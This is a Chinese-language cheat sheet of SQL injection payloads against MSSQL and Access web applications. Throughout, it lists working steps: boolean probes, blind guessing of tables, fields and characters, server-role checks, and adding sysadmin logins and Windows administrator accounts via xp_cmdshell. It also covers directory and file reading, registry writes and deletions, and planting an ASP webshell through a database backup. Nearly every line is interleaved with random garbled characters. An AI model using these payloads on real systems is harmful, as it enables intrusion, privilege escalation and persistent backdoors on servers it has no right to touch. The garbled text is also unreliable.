1.判断是否有注入;and 1=1 ;and 1=2 �T�3~k�>"W
2.初步判断是否是mssql ;and user>0 0Z~p%C<�LW
q_TR��q:&.
3.注入参数是字符'and [查询条件] and ''=' L\Aq6��q@c
�{K� <ii�h
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ���w�0�ht�
RzB�F~2 >i
5.判断数据库系统 �t�=|evOz]
�y�6L��Wx:
;and (select count(*) from sysobjects)>0 mssql LISM��ngQ.
z��,Medw6[
;and (select count(*) from msysobjects)>0 access �o1Ph~|s*8
4~y�(`\0?4
X�R+Y=�R�
�TX�$r��`~
6.猜数据库 ;and (select Count(*) from [数据库名])>0 c�imp�/n�"
����~kShq%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 IHe/��xQ�@
�4��NGA/
G
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 rQ�k�<90Ar
6"�"G,"B�
9.(1)猜字段的ascii值(access) NYE`�Kin�-
txW{7�[w+,
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 -j���%,Oo
qLw{?sH}J/
(2)猜字段的ascii值(mssql) �9)}[7Mg:C
��|�k+�8<\
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 $e���D.W�
G��K�OD/,
10.测试权限结构(mssql) �-}=i �04^
t�?q@H�8��
' qWA�L�u�
21�
O��'�M
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��{)�"iiJ�
k�gnm�Guka
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- U�F?�H�>Y&
e}Cif2#d~
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- H$@`,{M629
����[�<-��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \]&#��%6|V
KAC�6Snu1
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- <\E��h1�[F
@W va�tD
V
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- g�XYI��\�.
�p<zS�JLN�
;and 1=(select IS_MEMBER('db_owner'));-- &�=��#[(vl
c�V 5Caa�L
/e�7O$L)
�
3{ LP?w�:@
11.添加mssql和系统的帐户 JQ,1D`?.a�
7N-�w� �eX
;exec master.dbo.sp_addlogin username;-- L{hn�U7�sY
;exec master.dbo.sp_password null,username,password;-- N�$h{Y�vbn
]�F�;��f`o
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 1abtgD���L
�vg
��D7�7
;exec master.dbo.xp_cmdshell 'net user username password w9NHk~LHKF
�j�q�v�-�D
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �?*E'^~,H)
*$p2*%7Ne�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �Zk�A�U17f
�b+@JY2dvj
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- '@p['#�\uI
lz"�OC<D}(
/wP@�2ADB�
�kD*2~Z�?;
12.(1)遍历目录 Rn{iaM2Y�<
p�8Q,�@ql.
;create table dirs(paths varchar(100), id int) c}y� �[[EX
m\�$\�� 09
;insert dirs exec master.dbo.xp_dirtree 'c:\' jJuW-(/4[�
U7oo$gW%|T
;and (select top 1 paths from dirs)>0 �U}MXT�<6�
Z7_m)@%;kk
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) W0ep�A�GrB
�4d8B�`Fa9
zY|�t��0H�
Sv�c|0A�d&
(2)遍历目录 ix(=3�/Dgz
r41\r�,`Dj
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��G`\���f�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �`FYv�3w2�
��Eo�#u#IY
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �%,D�<�O,N
~�v]!+`_�J
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 4g
�:�>[q�
6ek�;�8dL�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~.Ur�L(�l=
o���o=Qt(#
�e�pU����:
%n�
��h��m
13.mssql中的存储过程 q o\?o�� �
~E�CD`N<YF
xp_regenumvalues 注册表根键, 子键 ,Fi>p0�bz�
=Qg�t$�{|�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 f.
FYR|%tq
_T2=J+"-Kp
xp_regread 根键,子键,键值名 :,J}z~I,lB
>y[oP!-�|P
;exec xp_regread ��PB#fP_0C
\ �g�LHi�~
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Gi "941zVl
:�{��oZ�~<
xp_regwrite 根键,子键, 值名, 值类型, 值 S(uf(q�|{�
R,|d�`)T
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 TZ2�=�O<Kj
U7�I qST��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ( �YQWb�Ok
�LE*h�9(�(
xp_regdeletevalue 根键,子键,值名 nS&3?lx9_�
xo&�]RYG[<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��>lBD<�;T
�h=(�DX5:A
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 lWqrU1Sjl
�oI.G-ChP�
1[j���b)j1
cI�p
D~0�\
14.mssql的backup创建webshell 7�c~�u=�U"
8G�oh4T �H
use model v��>��Mn�l
e0J6Ae4V�[
create table cmd(str image); CE"JS�-S?
?c7*_<W�5
insert into cmd(str) values (''); i}�� N8(B(
�~_s{�0g]B
backup database model to disk='c:\l.asp'; �ET�[�k�pL
jq+A-T}@�
k%�E2n:|*�
c �wOJy�>�
15.mssql内置函数 S��6fL>'uQ
fgBM_c&9T�
;and (select @@version)>0 获得Windows的版本号 59�#lU~K�v
�]�ix!tb.Q
;and user_name()='dbo' 判断当前系统的连接用户是不是sa mWyqG*�-Hb
&[A�t`Nw71
;and (select user_name())>0 爆当前系统的连接用户 #���h�l�Cs
�P1NJ�^rX
;and (select db_name())>0 得到当前连接的数据库 �&m[Qn!>i6
�P0$e~=Q^4
{U��84 _Pi
r �YF ��#^
16.简洁的webshell F��*�.g;So
tq�y@iEz+
use model [xT�:]Pw}�
l�/V�o-�#�
create table cmd(str image); A�.�D{�.�a
l27\diKP�J
insert into cmd(str) values (''); �V~
�TWKuR
�CE�C
�nq3
backup database model to disk='g:\wwwtest\l.asp';
